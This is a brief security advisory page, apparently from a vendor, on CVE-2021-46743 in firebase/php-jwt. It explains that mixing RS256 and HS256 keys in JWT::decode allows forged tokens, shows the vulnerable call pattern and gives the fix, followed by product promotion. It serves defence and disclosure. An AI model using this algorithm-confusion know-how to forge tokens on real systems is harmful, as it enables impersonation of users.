CVE-2021-46743
firebase/php-jwt is vulnerable to Access Restriction Bypass
91
Critical Risk
This Affects:
firebase/php-jwtTL;DR
Firebase/php-jwt is a popular PHP library that generates and validates JWTs (JSON Web Tokens). This exploit is only related to the validation part of the library. Successful exploitation can lead to an attacker forging any JWT and thus impersonate other users on your platform, potentially bypassing even 2FA.
Who does this affect?
You're only affected if you use more than 1 type of keys in your app, namely assymetric (RS256) and symmetric encryption (HS256). You also need to use the JWT::decode() function in the following way: JWT::decode( $token, [ array of at least 2 types of keys ], [ 'RS256', 'HS256 ] ); If you only pass 1 type of algorithm as the 3rd parameter, you're not affected.
Background info
firebase/php-jwt is vulnerable to Access Restriction Bypass in versions < 6.0.0.
How to fix this
Stop passing more than 1 algorithm as the 3rd parameter to the decode function! If you cannot do this refactor easily, you must upgrade to at least version 6.0.0.
Get Secure Now
Secure your code, cloud, and runtime environments in one central system. Find and fix vulnerabilities automatically.
No credit card required | Scan results in 32secs.
SOC 2Compliant
ISO 27001Compliant